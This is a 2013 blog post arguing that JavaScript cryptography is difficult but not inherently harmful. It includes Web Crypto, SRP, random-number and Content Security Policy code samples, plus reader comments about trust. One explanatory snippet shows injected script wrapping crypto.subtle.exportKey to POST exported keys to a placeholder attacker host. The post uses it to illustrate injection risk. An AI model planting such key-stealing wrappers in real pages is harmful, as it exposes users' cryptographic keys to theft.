Monday, August 5, 2013

In Defense of JavaScript Cryptography

Google "javascript cryptography" and you'll quickly find a fair number of people dismissing JS Crypto as a fools errand. My favorite is the Matasanto Security article entitled "JavaScript Cryptography Considered Harmful." The tone of the article seems a little alarmist to me. But... it also happens to bring up a few really great points. Its critique of the current state of web app crypto is mostly spot-on. However,  the state of the art is evolving quickly and may soon make the Matasano Security article mostly irrelevant.

This post is a brief rebuttal to the assertion that JavaScript cryptography should be considered "harmful." I would completely agree with "fraught with serious challenges" and "difficult to do right," but certainly not harmful.

Why Do JavaScript Crypto?

Before you can make a blanket statement like "JS Crypto is EVIL," you really should list out a few use cases. I think it's fair to say replicating HTTPS functionality in JavaScript is a poor idea. All popular browsers provide built-in support for HTTPS. What's more, these implementations have all been reviewed by multiple people to help ensure correctness and freedom from obvious bugs. So if you're just trying to communicate a password from a browser to a web server, use HTTPS. Don't try to replicate that functionality by yourself with JavaScript.

But there are several use cases where JS Crypto may be advantageous. The two I can think of off the top of my head are end-to-end message security and Secure Remote Password (SRP) support. Neither use case is directly supported by modern browsers, yet both are of interest to the general community.

End-to-end message security means encrypting a message in such a way that it can only be decrypted by its intended recipient. In the context of JavaScript crypto, this means your favorite email, microblogging or IM web app uses JavaScript to encrypt your message. The encrypted message is then sent to its destination by whatever means and is ultimately decrypted by a web app running on the recipient's machine. In the end-to-end encryption scenario, the server never has access to your decrypted message; and unless you explicitly share your keys with the server, it never will.
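
To make the idea concrete, here's a minimal sketch of what that could look like using the Web Cryptography API discussed later in this post. Treat the availability and exact shape of crypto.subtle as an assumption; the function names and the recipientPublicKey / recipientPrivateKey variables are placeholders for illustration, not a definitive implementation.

// Encrypt a message so only the holder of the matching private key can read it.
// recipientPublicKey is assumed to be an RSA-OAEP public CryptoKey obtained
// out-of-band (for example, imported from the recipient's published key).
async function encryptForRecipient( recipientPublicKey, message ) {
  var plaintext = new TextEncoder().encode( message );
  var ciphertext = await crypto.subtle.encrypt(
    { name: "RSA-OAEP" }, recipientPublicKey, plaintext );
  return ciphertext;   // the server only ever sees this opaque blob
}

// On the recipient's machine, the matching private key reverses the operation.
async function decryptFromSender( recipientPrivateKey, ciphertext ) {
  var plaintext = await crypto.subtle.decrypt(
    { name: "RSA-OAEP" }, recipientPrivateKey, ciphertext );
  return new TextDecoder().decode( plaintext );
}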

End-to-end message security contrasts with the "transport security" offered by SSL/TLS. HTTPS, which uses Secure Sockets Layer (SSL), a.k.a. Transport Layer Security (TLS), encrypts the link between the browser and the web server. To communicate securely with another person, you would send an unencrypted message to your web server over the encrypted HTTPS link. The server would then forward the message to its recipient using a different (hopefully) encrypted HTTPS link. Because the message is unencrypted when it gets to the server, the server operator can see the contents of the message. But because the link is encrypted, eavesdroppers listening in on the conversation should not be able to read the message.

Secure Remote Password (SRP), developed at Stanford, is an authentication protocol with many desirable features: it is resistant to password dictionary attacks and establishes a shared session key which may be used to authenticate or encrypt messages between a client and server. Or, more likely, between a client and a piece of computing equipment "behind" the web server for which the web server acts as a proxy. To be sure, SRP's utility is diminished by the near-universal support of SSL/TLS, but there are definitely situations where it can be useful.
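
To give a flavor of the math involved, here's a rough sketch of the client-side registration step, where the browser computes the verifier v = g^x mod N that the server stores in place of the password. This assumes a modern runtime with BigInt and crypto.subtle; the N and g values and the helper names are placeholders for illustration only. A real implementation must use one of the large groups from RFC 5054 and the full protocol, not just this fragment.

// SRP registration sketch: derive x from the salt and password, then compute
// the verifier v = g^x mod N. The password itself never leaves the browser.
// N below is a truncated placeholder, NOT a real SRP group prime.
var N = 0xEEAF0AB9ADB38DD69C33F80AFA8FC5E8n;
var g = 2n;

// Square-and-multiply modular exponentiation over BigInts.
function modPow( base, exp, mod ) {
  var result = 1n;
  base = base % mod;
  while( exp > 0n ) {
    if( exp & 1n ) { result = ( result * base ) % mod; }
    base = ( base * base ) % mod;
    exp >>= 1n;
  }
  return result;
}

// Interpret a SHA-256 digest as a big-endian integer.
async function hashToBigInt( bytes ) {
  var digest = new Uint8Array( await crypto.subtle.digest( "SHA-256", bytes ) );
  var hex = "";
  for( var i = 0; i < digest.length; i ++ ) {
    hex += ( "0" + digest[ i ].toString( 16 ) ).slice( -2 );
  }
  return BigInt( "0x" + hex );
}

// x = H( salt | H( username ":" password ) ), v = g^x mod N
// salt is assumed to be a Uint8Array of random bytes.
async function computeVerifier( salt, username, password ) {
  var enc = new TextEncoder();
  var inner = new Uint8Array(
    await crypto.subtle.digest( "SHA-256", enc.encode( username + ":" + password ) ) );
  var outer = new Uint8Array( salt.length + inner.length );
  outer.set( salt, 0 );
  outer.set( inner, salt.length );
  var x = await hashToBigInt( outer );
  return modPow( g, x, N );
}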

These are not the only reasons why you might want to use something other than HTTPS; but they are two reasonably important use cases not directly supported by SSL/TLS.

The Chicken and the Egg

The Matasano article assumes the reason you're using JavaScript crypto in your browser is to encrypt a user password for its trip from the browser to the server. It then presents this "chicken and egg" problem:
  • if you don't trust the internet to securely deliver a password from the browser to the server, why trust it to deliver a JavaScript encryption library?
  • and if you use HTTPS to ensure no one has tampered with your JavaScript encryption library, why not just use HTTPS to secure your password and be done with it?
I mostly agree with this assessment. However, there may be a situation where your JavaScript encryption library is served off a different host than the one you're communicating with. Imagine you're trying to communicate with an 8- or 16-bit microcontroller. There are several on the market today with enough CPU horsepower, memory and IO to speak SLIP or PPP (or even IPv6). For policy, debugging or legal reasons, you may end up serving pages off the microcontroller over TLS that provides authentication only, with no bulk encryption. It's a bit of a corner case, but I've actually found myself in exactly that situation: my microcontroller could handle authentication with ECDSA, but couldn't cope with any bulk cipher I was willing to use.

But there are some interesting developments in the chicken-and-egg question. It turns out there's a group of people working on a specification to introduce cryptographic primitives to JavaScript in the browser. The Web Cryptography API is an emerging standard from the W3C and will provide basic crypto functions to JS web apps. When widely deployed, this should eliminate most of the concerns around the question "hey! where did my crypto implementation come from?"
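
For example, getting a SHA-256 digest from the browser's native implementation, instead of shipping a hash function written in JavaScript, should look roughly like this. The exact shape of the call may change as the spec evolves, so treat this as a sketch rather than gospel:

// Ask the browser for a SHA-256 digest of a string.
async function sha256( text ) {
  var data = new TextEncoder().encode( text );
  return crypto.subtle.digest( "SHA-256", data );   // resolves to an ArrayBuffer
}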

Good Random Numbers

The Matasano article correctly observes that the JavaScript Math.random() function is inappropriate for use in "real" security protocols. It simply doesn't utilize sufficient entropy. Fortunately, Chrome and Firefox have implemented the random number generator from the Web Cryptography API in recent builds. According to this Mozilla Developer Network page, support for crypto.getRandomValues() was added in Chrome 11 and Firefox 21.

If you are truly interested in properly implementing security-related protocols, you must use this call instead of Math.random().
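
For example, generating a 128-bit random token in a browser that supports the call looks like this (the hex-encoding step is just one way to package the bytes):

// Fill a 16-byte (128-bit) array with cryptographically strong random bytes.
// Math.random() must never be used for this: it isn't seeded with enough
// entropy and its output is predictable.
var bytes = new Uint8Array( 16 );
crypto.getRandomValues( bytes );

// Turn the bytes into a hex string suitable for a nonce or session token.
var token = Array.prototype.map.call( bytes, function( b ) {
  return ( "0" + b.toString( 16 ) ).slice( -2 );
} ).join( "" );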

Extensible Languages and Insecure Content

IMHO, the fundamental concern with web apps is the risk that occurs when JavaScript's extensible nature meets insecure content. The Matasano article talks about this in the context of downloading JavaScript to implement crypto primitives, but once a bad guy can inject code into your JS execution context, it's all borked, not just the crypto.

The problem here stems from the fact that JavaScript is, by design, an extensible programming language. It's possible to replace some of the basic functions provided by JavaScript and the DOM API. Here's a simple example where I replace the escape() function with a function that reverses a string before escaping it:

// Save a reference to the original implementation...
window.prevescape = window.escape;
// ...then replace escape() with a version that reverses its input first.
window.escape = function( input ) {
  var output = "";
  // Walk the input from its last character to its first.
  for( var i = 1, il = input.length; i <= il; i ++ ) {
    output += input.substr( input.length - i, 1 );
  }
  // Hand the reversed string to the original escape().
  return prevescape( output );
};

This example doesn't do anything horrible, but it should demonstrate how easy it is to extend or even replace core JavaScript functionality. And it's just as easy to replace the code that manages import/export of cryptographic keys as it is to replace the escape() function.
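
For instance, a hypothetical injected script could shadow the browser's key-export routine so that every exported key is quietly copied to someone else's server. The endpoint URL below is made up; this is purely an illustration of the shape of the attack, not working exploit code.

// Hypothetical attack sketch: wrap crypto.subtle.exportKey so exported key
// material is leaked before being returned to the unsuspecting application.
var realExportKey = crypto.subtle.exportKey.bind( crypto.subtle );
crypto.subtle.exportKey = function( format, key ) {
  return realExportKey( format, key ).then( function( exported ) {
    // "https://evil.example/steal" is a placeholder endpoint. A real attack
    // would also serialize ArrayBuffer formats properly before sending.
    var xhr = new XMLHttpRequest();
    xhr.open( "POST", "https://evil.example/steal" );
    xhr.send( JSON.stringify( exported ) );
    return exported;   // the caller never notices anything changed
  } );
};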

The ability to replace or extend JavaScript functionality is a good thing when you're using it to fix bugs or add useful features. But if a bad guy can insert a script tag into your page, all bets are off: you're completely 0wn3d. Since it's unlikely you're going to hack your own web app, we need to figure out a way to prevent black-hat script tags from appearing in your web pages.

In Conclusion

Securely executing JavaScript applications in a browser is not hopelessly borked. Neither is JavaScript Crypto. You do have to take care to defend against the common vulnerabilities introduced by user-generated content. And unless you defend against a man in the middle by sending any content capable of modifying the JavaScript execution context over TLS, it will be possible for a bad guy to insert his own code into your web application.

Progress is being made with the introduction of the Content Security Policy and Web Cryptography API specifications from the W3C. We're even starting to see browser developers implement them, which is a good thing.
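
As a concrete example, a response header along these lines (the CDN host name is a placeholder) tells the browser to refuse inline scripts and to load script only from origins you explicitly list:

Content-Security-Policy: default-src 'self'; script-src 'self' https://cdn.example.com; object-src 'none'

Because 'unsafe-inline' is absent from script-src, a script tag injected through user-generated content is simply not executed.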

But more work needs to be done to "secure" JavaScript code. It could be as simple as making the browser's crypto object read-only. This would not eliminate all vulnerabilities, but it would reduce the attack surface. We could also require that all scripts referencing the crypto object adhere to common same-origin protections (modulo CORS or CSP).
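
Here's a defensive sketch of that idea. Whether a given engine fully honors freezing host objects like crypto is an assumption on my part, so treat it as illustrative rather than a guarantee:

// Run this as the very first script on the page, before anything untrusted.
// Keep private references to the crypto functions and make a best-effort
// attempt to stop later scripts from swapping them out.
var trustedCrypto = window.crypto;
var trustedRandom = trustedCrypto.getRandomValues.bind( trustedCrypto );

Object.freeze( trustedCrypto );
Object.freeze( Object.getPrototypeOf( trustedCrypto ) );   // Crypto.prototype

// Security-sensitive code later calls trustedRandom() instead of reaching
// through the (possibly tampered-with) global object each time.
var nonce = trustedRandom( new Uint8Array( 16 ) );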

This article reflects my personal opinion, and may not reflect opinions or policies of my employer.

3 comments:

  1. Something I think JavaScript (or maybe Web resources generally) really needs is code signing, the way Windows and Java have had for a while. Code signing would allow you to have trusted code (written by an author you trust), without having to trust the server hosting it. The same-origin policy seems too much of an all-or-nothing prospect.

    For example, if all the JavaScript on a page is written by authors you trust, you could trust the whole thing, even if the HTML was written by an untrusted party.

    Because JavaScript is a dynamic language, code signing isn't quite as useful as it could be, but perhaps something could be figured out with sandboxing between signed and unsigned code, maybe using a Web Worker-like approach.

    While on the topic of features I like from Java, I think it would be nice to be able to distribute JavaScript libraries in archive formats (like Java does with JAR), rather than being forced to minify everything into one giant blob. Then maybe things like SPDY wouldn't be needed as much.

  2. When you say "Since it's unlikely you're going to hack your own web app..." you should clarify whose web app it is. It does not belong to the client, the person who needs to rely on the cryptography. It belongs to whoever is serving it. With JS cryptography the end user needs to trust the owner. With traditional cryptography the end user places no trust (other than correctness of implementation, which is verifiable) in a third party. This is very relevant in light of government snooping. In the case of JS cryptography the owner of the web app could be compelled by their government to hack their own system and betray the trust of the client. In traditional cryptography this is not a worry.

    Replies
    1. Yes. If you point your browser at a web page maintained by an untrustworthy source then it doesn't matter if javascript crypto is any good. However, if you point your browser at a web page maintained by a trustworthy source, then it is very important that JS crypto and web security features be implemented correctly.

      Technology can't help you if the other side of the connection is untrustworthy. Even if they implement security features correctly, they can still share your data with unauthorized parties.

      The term "trusted" has a different meaning than "secure." In secure systems, the term "trusted" means a component you trust inherently because you have to; because there is no way to use protocol or technology to ensure they will keep your data confidential.

      So yes. At the end of the day, you should only use privacy (and/or authentication) services from organizations you trust. And that goes for chip vendors, OS developers and software vendors of all stripes; not just web pages.
